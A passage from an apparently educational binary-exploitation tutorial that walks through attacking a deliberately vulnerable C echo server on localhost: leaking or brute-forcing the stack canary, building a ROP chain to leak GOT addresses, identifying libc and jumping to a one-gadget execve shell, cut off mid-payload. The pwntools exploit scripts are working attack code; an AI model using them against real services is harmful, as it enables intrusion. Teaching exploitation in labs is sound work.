class="o">=</span> <span class="mi">1234</span><span class="p">;</span> <span class="n">serv_addr</span><span class="p">.</span><span class="n">sin_family</span> <span class="o">=</span> <span class="n">AF_INET</span><span class="p">;</span> <span class="n">serv_addr</span><span class="p">.</span><span class="n">sin_addr</span><span class="p">.</span><span class="n">s_addr</span> <span class="o">=</span> <span class="n">INADDR_ANY</span><span class="p">;</span> <span class="n">serv_addr</span><span class="p">.</span><span class="n">sin_port</span> <span class="o">=</span> <span class="n">htons</span><span class="p">(</span><span class="n">portno</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">bind</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">serv_addr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">serv_addr</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">perror</span><span class="p">(</span><span class="s">"ERROR on binding"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">listen</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span> <span class="n">clilen</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">cli_addr</span><span class="p">);</span> <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="n">newsockfd</span> <span class="o">=</span> <span class="n">accept</span><span class="p">(</span><span class="n">sockfd</span><span class="p">,</span> <span class="p">(</span><span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">cli_addr</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">clilen</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">newsockfd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">perror</span><span class="p">(</span><span class="s">"ERROR on accept"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">fork</span><span class="p">();</span> <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">perror</span><span class="p">(</span><span class="s">"ERROR on fork"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">pid</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">close</span><span class="p">(</span><span class="n">sockfd</span><span class="p">);</span> <span class="n">write</span><span class="p">(</span><span class="n">newsockfd</span><span class="p">,</span> <span class="s">"Welcome to the best echo service in the world!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="mi">47</span><span class="p">);</span> <span class="n">serve</span><span class="p">(</span><span class="n">newsockfd</span><span class="p">);</span> <span class="n">send</span><span class="p">(</span><span class="n">newsockfd</span><span class="p">,</span> <span class="s">"Goodbye!</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="s">"Goodbye!</span><span class="se">\n</span><span class="s">"</span><span class="p">),</span> <span class="mi">0</span><span class="p">);</span> <span class="n">close</span><span class="p">(</span><span class="n">newsockfd</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">close</span><span class="p">(</span><span class="n">newsockfd</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></div></div> <h2 id="analysis">Analysis</h2> <p>We’ll start our exercise by executing the binary with <code class="language-plaintext highlighter-rouge">./cookies</code> and we try to connect with <code class="language-plaintext highlighter-rouge">nc localhost 1234</code> to get a first impression of the software.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc localhost 1234 Welcome to the best echo service in the world! Test Test Goodbye! </code></pre></div></div> <p>Okay, we can enter some text which is saved to the buffer. We enter an arbitrary string and we can overflow the buffer of 1024 bytes.<br /> Let’s start playing around!<br /> Attach <code class="language-plaintext highlighter-rouge">gdb</code> to the process:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gdb -q ./cookies gef➤ set follow-fork-mode child gef➤ !pidof cookies &lt;pid&gt; gef➤ attach &lt;pid&gt; gef➤ continue </code></pre></div></div> <p>We set the option <code class="language-plaintext highlighter-rouge">follow-fork-mode child</code> to debug the child process if the master process forks. After that, we attach to the process of the master process by using the command <code class="language-plaintext highlighter-rouge">!pidof cookies</code> to get the process ID and the command <code class="language-plaintext highlighter-rouge">attach &lt;pid&gt;</code> to attach to the process.<br /> To begin our analysis, we start writing our exploit with python. First, we connect to the remote target and send our payload.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">r</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1234</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">5000</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> </code></pre></div></div> <p>Let’s look into <code class="language-plaintext highlighter-rouge">gdb</code>:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[#0] Id 1, Name: "cookies", stopped, reason: SIGABRT .... gef➤ backtrace #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007fb6b9ded801 in __GI_abort () at abort.c:79 #2 0x00007fb6b9e36897 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7fb6b9f63988 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007fb6b9ee1cd1 in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x0, msg=msg@entry=0x7fb6b9f63966 "stack smashing detected") at fortify_fail.c:33 #4 0x00007fb6b9ee1c92 in __stack_chk_fail () at stack_chk_fail.c:29 #5 0x0000000000400985 in serve () #6 0x4141414141414141 in ?? () #7 0x4141414141414141 in ?? () #8 0x4141414141414141 in ?? () .... </code></pre></div></div> <p>We got a <code class="language-plaintext highlighter-rouge">SIGABRT</code> and the reason for that seems to be a wrong stack cookie (<code class="language-plaintext highlighter-rouge">#4 0x00007fb6b9ee1c92 in __stack_chk_fail ()</code>).<br /> Let’s examine the crash in detail. The item <code class="language-plaintext highlighter-rouge">#5</code> of the back trace gives us a first indicator from where this <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> function is called. To find out what is happening we disassemble the <code class="language-plaintext highlighter-rouge">serve</code> function.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ disassemble serve Dump of assembler code for function serve: 0x0000000000400907 &lt;+0&gt;: push rbp 0x0000000000400908 &lt;+1&gt;: mov rbp,rsp 0x000000000040090b &lt;+4&gt;: sub rsp,0x420 0x0000000000400912 &lt;+11&gt;: mov DWORD PTR [rbp-0x414],edi 0x0000000000400918 &lt;+17&gt;: mov rax,QWORD PTR fs:0x28 0x0000000000400921 &lt;+26&gt;: mov QWORD PTR [rbp-0x8],rax 0x0000000000400925 &lt;+30&gt;: xor eax,eax 0x0000000000400927 &lt;+32&gt;: lea rsi,[rbp-0x410] 0x000000000040092e &lt;+39&gt;: mov eax,DWORD PTR [rbp-0x414] 0x0000000000400934 &lt;+45&gt;: mov ecx,0x0 0x0000000000400939 &lt;+50&gt;: mov edx,0x800 0x000000000040093e &lt;+55&gt;: mov edi,eax 0x0000000000400940 &lt;+57&gt;: call 0x400730 &lt;recv@plt&gt; 0x0000000000400945 &lt;+62&gt;: lea rax,[rbp-0x410] 0x000000000040094c &lt;+69&gt;: mov rdi,rax 0x000000000040094f &lt;+72&gt;: call 0x400750 &lt;strlen@plt&gt; 0x0000000000400954 &lt;+77&gt;: mov rdx,rax 0x0000000000400957 &lt;+80&gt;: lea rsi,[rbp-0x410] 0x000000000040095e &lt;+87&gt;: mov eax,DWORD PTR [rbp-0x414] 0x0000000000400964 &lt;+93&gt;: mov ecx,0x0 0x0000000000400969 &lt;+98&gt;: mov edi,eax 0x000000000040096b &lt;+100&gt;: call 0x400780 &lt;send@plt&gt; 0x0000000000400970 &lt;+105&gt;: nop 0x0000000000400971 &lt;+106&gt;: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400975 &lt;+110&gt;: xor rax,QWORD PTR fs:0x28 0x000000000040097e &lt;+119&gt;: je 0x400985 &lt;serve+126&gt; 0x0000000000400980 &lt;+121&gt;: call 0x400760 &lt;__stack_chk_fail@plt&gt; 0x0000000000400985 &lt;+126&gt;: leave 0x0000000000400986 &lt;+127&gt;: ret End of assembler dump. </code></pre></div></div> <p>Okay, we see at <code class="language-plaintext highlighter-rouge">serve+17</code> and <code class="language-plaintext highlighter-rouge">serve+26</code> that the stack cookie is loaded from <code class="language-plaintext highlighter-rouge">fs:0x28</code> and it is put before the saved base pointer (<code class="language-plaintext highlighter-rouge">rbp-0x08</code>) on the stack. At the end of the function (<code class="language-plaintext highlighter-rouge">serve+106</code>) the saved stack cookie will be loaded and then compared with the original stack cookie at <code class="language-plaintext highlighter-rouge">fs:0x28</code>. If the stack cookie matches the original stack cookie a jump will be taken to the <code class="language-plaintext highlighter-rouge">leave</code> instructions and the function returns. If the stack cookie is corrupt then the <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> function will be called and the program aborts.<br /> Our goal now is to leak the stack cookie to be able to overwrite the return address of the <code class="language-plaintext highlighter-rouge">serve</code> function. For that, we have to find out the offset to <code class="language-plaintext highlighter-rouge">rbp-0x08</code> from our input buffer. We put a breakpoint on <code class="language-plaintext highlighter-rouge">serve+110</code>, send a cyclic pattern via <code class="language-plaintext highlighter-rouge">pwntools</code> and compute the offset with the value in <code class="language-plaintext highlighter-rouge">rax</code>.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ breakpoint *serve+110 Breakpoint 1 at 0x400975 gef➤ continue ... $rax : 0x6161616a61616169 ("iaaajaaa"?) ... </code></pre></div></div> <p>The offset is 1032 bytes. We can verify the offset by sending 1032 bytes of <code class="language-plaintext highlighter-rouge">A</code> and one <code class="language-plaintext highlighter-rouge">B</code>. Perfect: <code class="language-plaintext highlighter-rouge">$rax : 0xf28cd8655c310f42</code> (The value should be different because the cookie is randomly chosen)<br /> Since this is an echo service, we have now two possible ways to leak a stack cookie.</p> <h3 id="brute-force-method">Brute Force Method</h3> <p>The idea for brute force is that we guess each byte of the stack cookie until we got all 8 bytes. To successfully do that, we need to distinguish between normal behavior and wrong behavior of the execution.<br /> If we are sending <code class="language-plaintext highlighter-rouge">B</code> we are not getting a <code class="language-plaintext highlighter-rouge">Goodbye!</code> message from the application because it aborts before exiting the process in an intended way. If we are sending a null byte <code class="language-plaintext highlighter-rouge">\x00</code> then the application is normally exiting and we are getting the <code class="language-plaintext highlighter-rouge">Goodbye!</code> message. This is all we need to distinguish between the two states of the application.<br /></p> <p>A brute force is visualized in the next figure where the red part is the static payload and the green values are our guesses for each byte. The response of the target could either be <code class="language-plaintext highlighter-rouge">EOF - End Of File</code> (wrong guess) or the correct message <code class="language-plaintext highlighter-rouge">Goodbye!</code> (correct guess, move to the next byte).</p> <p><br /> <img src="/assets/images/bseries_ch6_stack.gif" width="500" /> <br /></p> <p>Let’s write a brute force method for the stack cookie. You can verify the stack cookie with <code class="language-plaintext highlighter-rouge">gdb</code> and a breakpoint at <code class="language-plaintext highlighter-rouge">serve+110</code>. Or you attach <code class="language-plaintext highlighter-rouge">gdb</code> to the process and type <code class="language-plaintext highlighter-rouge">checksec</code> which will print the stack cookie (feature of <code class="language-plaintext highlighter-rouge">gef</code>).<br /><b></b> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> <b>Please try it on your own first because the method is straightforward. If you get stuck you can still peek into the solution.</b> <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">brute_canary</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Brute force started..."</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">"error"</span> <span class="c1"># ignore info. It would spam with "open connection" "connection closed" </span> <span class="n">canary</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span> <span class="k">for</span> <span class="n">canary_byte</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">canary</span><span class="p">),</span> <span class="mi">8</span><span class="p">):</span> <span class="c1"># guess 8 bytes for a 64-bit program </span> <span class="k">for</span> <span class="n">value</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">256</span><span class="p">):</span> <span class="c1"># guess values from 0-255 </span> <span class="k">while</span> <span class="mi">1</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="k">break</span> <span class="k">except</span><span class="p">:</span> <span class="c1"># device busy exception, too many requests </span> <span class="k">print</span><span class="p">(</span><span class="s">"[!] Connection attempt failed. New attempt in 1 second..."</span><span class="p">)</span> <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">io</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">msg</span> <span class="o">+</span> <span class="n">canary</span> <span class="o">+</span> <span class="n">pack</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="mi">8</span><span class="p">))</span> <span class="n">response</span> <span class="o">=</span> <span class="s">""</span> <span class="k">try</span><span class="p">:</span> <span class="n">response</span> <span class="o">=</span> <span class="n">io</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"Goodbye!"</span><span class="p">)</span> <span class="k">except</span> <span class="nb">EOFError</span><span class="p">:</span> <span class="k">pass</span> <span class="k">finally</span><span class="p">:</span> <span class="n">io</span><span class="p">.</span><span class="n">shutdown</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">if</span> <span class="s">"Goodbye!"</span> <span class="ow">in</span> <span class="n">response</span><span class="p">:</span> <span class="c1"># correct guess </span> <span class="n">canary</span> <span class="o">+=</span> <span class="n">pack</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] [%s] = %s"</span> <span class="o">%</span> <span class="p">(</span><span class="nb">str</span><span class="p">(</span><span class="n">canary_byte</span><span class="p">),</span> <span class="nb">hex</span><span class="p">(</span><span class="n">value</span><span class="p">)))</span> <span class="k">break</span> <span class="n">context</span><span class="p">.</span><span class="n">log_level</span> <span class="o">=</span> <span class="s">"info"</span> <span class="c1"># enable info logging again </span> <span class="n">canary</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">canary</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Stack cookie is %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">canary</span><span class="p">))</span> <span class="k">return</span> <span class="n">canary</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">brute_canary</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="mi">1032</span><span class="p">,</span> <span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1234</span><span class="p">)</span> </code></pre></div></div> <h3 id="leak-via-write">Leak via Write</h3> <p>For this challenge a direct leak is possible and very simple. Since we can write past the input buffer and the stack cookie is directly behind it, we can simply overwrite the null byte of the stack cookie to print more data (<code class="language-plaintext highlighter-rouge">strlen</code> will return a bigger value). Then we have to parse the returned value. In the case of a null byte in the stack cookie itself we can just repeat the same function with a different offset until we get at least 8 bytes (the size of the stack cookie in 64-bit systems).<br /> Again, try it on your own first! <br /> Here is a function which leaks the stack cookie:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">leak_canary</span><span class="p">(</span><span class="n">offset</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">leaked_data</span><span class="o">=</span><span class="s">""</span><span class="p">):</span> <span class="n">io</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="n">io</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="s">"A"</span><span class="o">*</span><span class="n">offset</span><span class="o">+</span><span class="s">"B"</span><span class="p">)</span> <span class="c1"># overwrite null byte with B to read more bytes ;-) </span> <span class="n">response</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="s">""</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="k">while</span> <span class="mi">1</span><span class="p">:</span> <span class="n">response</span> <span class="o">+=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">io</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="k">except</span> <span class="nb">EOFError</span><span class="p">:</span> <span class="k">pass</span> <span class="n">response</span> <span class="o">=</span> <span class="n">response</span><span class="p">[</span><span class="n">offset</span><span class="p">:]</span><span class="c1"># remove A's </span> <span class="n">response</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span> <span class="c1"># Replace B with the original null byte </span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">leaked_data</span><span class="p">)</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">response</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">8</span><span class="p">:</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Got enough data.."</span><span class="p">)</span> <span class="n">leaked_data</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">leaked_data</span> <span class="o">+</span> <span class="n">response</span><span class="p">)</span> <span class="n">stack_cookie</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">leaked_data</span><span class="p">[:</span><span class="mi">8</span><span class="p">])</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Stack cookie is %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">stack_cookie</span><span class="p">))</span> <span class="k">return</span> <span class="n">stack_cookie</span> <span class="k">else</span><span class="p">:</span> <span class="k">return</span> <span class="n">leak_canary</span><span class="p">(</span><span class="n">offset</span><span class="o">+</span><span class="nb">len</span><span class="p">(</span><span class="n">response</span><span class="p">),</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">response</span><span class="p">)</span> <span class="c1"># if a second null byte is in the canary you will have to leak more data </span> <span class="n">io</span><span class="p">.</span><span class="n">shutdown</span><span class="p">()</span> <span class="n">io</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">leak_canary</span><span class="p">(</span><span class="mi">1032</span><span class="p">,</span> <span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1234</span><span class="p">)</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python exploit.py [+] Opening connection to localhost on port 1234: Done [*] Got enough data.. [*] Stack cookie is 0xf28cd8655c310f00 </code></pre></div></div> <h3 id="exploit-development">Exploit Development</h3> <p>For further analysis of the target, we can use the leak function or a hard-coded stack cookie because the value does not change.<br /> If we want to use the leak function, we have to add a <code class="language-plaintext highlighter-rouge">raw_input</code> between the canary leak and the rest of the code to pause the execution of the script (or use <code class="language-plaintext highlighter-rouge">pause()</code> of <code class="language-plaintext highlighter-rouge">pwntools</code>). This will allow us to attach the debugger to the process. Then we will send a cyclic pattern and get the offset to the return address. (you could also use <code class="language-plaintext highlighter-rouge">gdb.attach</code> of pwntools)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python exploit.py [+] Opening connection to localhost on port 1234: Done [*] Got enough data.. [*] Stack cookie is 0xfead3e7449a42700 Attach now! </code></pre></div></div> <p>We got an offset of 8 which does make sense because there is only the saved base pointer in between. <code class="language-plaintext highlighter-rouge">0x00007ffe38898ef8│+0x0000: 0x4343434343434343 ← $rsp</code></p> <p>Our next steps:</p> <ul> <li>Leak <code class="language-plaintext highlighter-rouge">GOT</code> addresses to identify libc version</li> <li>Compute libc base address</li> <li>Get one shot gadget to get a shell</li> <li>Redirect stdout/stdin to sockets</li> <li>Shell :-)</li> </ul> <p>To leak libc function addresses of the <code class="language-plaintext highlighter-rouge">GOT</code> we do the same thing as in <code class="language-plaintext highlighter-rouge">Chapter 4</code>. This time with <code class="language-plaintext highlighter-rouge">write</code> instead of <code class="language-plaintext highlighter-rouge">puts</code>. The third parameter is already set to <code class="language-plaintext highlighter-rouge">0x408</code> (the length of <code class="language-plaintext highlighter-rouge">strlen()</code>) and therefore we are lucky because we don’t have a suitable gadget to set <code class="language-plaintext highlighter-rouge">rdx</code>.</p> <p>The file descriptor of the used socket can be obtained via shell commands:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ info proc process 49928 cmdline = './cookies' cwd = '/BinaryExploitationSeries/Chapter 6' exe = '/BinaryExploitationSeries/Chapter 6/cookies' gef➤ !ls -l /proc/49928/fd total 0 lrwx------ 1 work work 64 Dez 4 14:11 0 -&gt; /dev/pts/3 lrwx------ 1 work work 64 Dez 4 14:11 1 -&gt; /dev/pts/3 lrwx------ 1 work work 64 Dez 4 14:11 2 -&gt; /dev/pts/3 lrwx------ 1 work work 64 Dez 4 14:11 4 -&gt; 'socket:[370150]' # &lt;---- fd = 4 </code></pre></div></div> <p>Now we have to put everything together.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">leak_function_address</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">canary</span><span class="p">,</span> <span class="n">challenge_elf</span><span class="p">,</span> <span class="n">function_name</span><span class="p">,</span> <span class="n">count</span><span class="p">):</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span> <span class="p">[</span><span class="s">"A"</span><span class="o">*</span><span class="n">count</span> <span class="o">+</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="p">(</span><span class="mi">1032</span><span class="o">-</span><span class="n">count</span><span class="p">),</span> <span class="c1"># set rdx to leak only 'count' bytes (strlen(input) == count) ;-) </span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">),</span> <span class="s">"B"</span><span class="o">*</span><span class="mi">8</span><span class="p">,</span> <span class="c1"># saved base pointer </span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b83</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="mi">4</span><span class="p">),</span> <span class="c1"># fd = 4 = socket </span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b81</span><span class="p">),</span> <span class="c1"># pop rsi ; pop r15 ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="n">challenge_elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="n">function_name</span><span class="p">]),</span> <span class="c1"># address of recv in GOT </span> <span class="s">"A"</span><span class="o">*</span><span class="mi">8</span><span class="p">,</span> <span class="c1"># dummy </span> <span class="n">p64</span><span class="p">(</span><span class="n">challenge_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"write"</span><span class="p">]),</span> <span class="p">])</span> <span class="p">....</span> <span class="c1"># send, receive and parse like last time ;-) </span></code></pre></div></div> <p>Now we can leak a few functions and identify the libc version via <a href="https://libc.blukat.me/">libc.blukat.me</a>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">recv_leaked</span> <span class="o">=</span> <span class="n">leak_function_address</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1234</span><span class="p">,</span> <span class="n">canary</span><span class="p">,</span> <span class="n">challenge_elf</span><span class="p">,</span> <span class="s">"recv"</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span> <span class="c1"># __recv </span><span class="n">fork_leaked</span> <span class="o">=</span> <span class="n">leak_function_address</span><span class="p">(</span><span class="s">"localhost"</span><span class="p">,</span> <span class="mi">1234</span><span class="p">,</span> <span class="n">canary</span><span class="p">,</span> <span class="n">challenge_elf</span><span class="p">,</span> <span class="s">"fork"</span><span class="p">,</span> <span class="mi">8</span><span class="p">)</span> <span class="c1"># fork </span><span class="p">.....</span> <span class="p">[</span><span class="o">+</span><span class="p">]</span> <span class="n">Opening</span> <span class="n">connection</span> <span class="n">to</span> <span class="n">localhost</span> <span class="n">on</span> <span class="n">port</span> <span class="mi">1234</span><span class="p">:</span> <span class="n">Done</span> <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">recv</span> <span class="o">@</span> <span class="mh">0x7fb6b9ecfa00</span> <span class="p">[</span><span class="o">+</span><span class="p">]</span> <span class="n">Opening</span> <span class="n">connection</span> <span class="n">to</span> <span class="n">localhost</span> <span class="n">on</span> <span class="n">port</span> <span class="mi">1234</span><span class="p">:</span> <span class="n">Done</span> <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">fork</span> <span class="o">@</span> <span class="mh">0x7fb6b9e91a50</span> <span class="c1"># -&gt; libc6_2.27-3ubuntu1_amd64 # Compute libc base as in chapter 4 </span></code></pre></div></div> <p><img src="/assets/images/bseries_ch6_blukat_me.png" /></p> <p>Now, we know the used libc version on the server. Let’s get a one gadget and try to exploit it!</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>one_gadget &lt;identified libc&gt; 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL </code></pre></div></div> <p>Add another <code class="language-plaintext highlighter-rouge">raw_input()</code> to pause the execution and put another payload into the script.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span> <span class="p">[</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="p">(</span><span class="mi">1032</span><span class="p">),</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">),</span> <span class="s">"B"</span><span class="o">*</span><span class="mi">8</span><span class="p">,</span> <span class="c1"># saved base pointer </span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4f322</span><span class="p">),</span> <span class="c1"># execve </span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">150</span> <span class="c1"># to meet our constraint -&gt; rsp + 0x40 == NULL </span> <span class="p">])</span> </code></pre></div></div> <p>Then attach the debugger before <code class="language-plaintext highlighter-rouge">execve</code> is triggered … Perfect! We executed a shell.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ c Continuing. process 50645 is executing new program: /bin/dash Warning: Cannot insert breakpoint 1. Cannot access memory at address 0x400986 gef➤ detach Detaching from program: /bin/dash, process 50645 </code></pre></div></div> <p>Last problem for today is that we cannot interact with the shell because it will use stdout/stdin and not our socket file descriptor. Therefore, we have to redirect stdout (1) and stdin (0) file descriptors to the socket file descriptor (4). Luckily, there is a function called <code class="language-plaintext highlighter-rouge">dup2</code> which does that for us. :-)<br /> Let’s extend our small rop chain to call dup2 for stdin and stdout.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">(</span> <span class="p">[</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="p">(</span><span class="mi">1032</span><span class="p">),</span> <span class="n">p64</span><span class="p">(</span><span class="n">canary</span><span class="p">),</span> <span class="s">"B"</span><span class="o">*</span><span class="mi">8</span><span 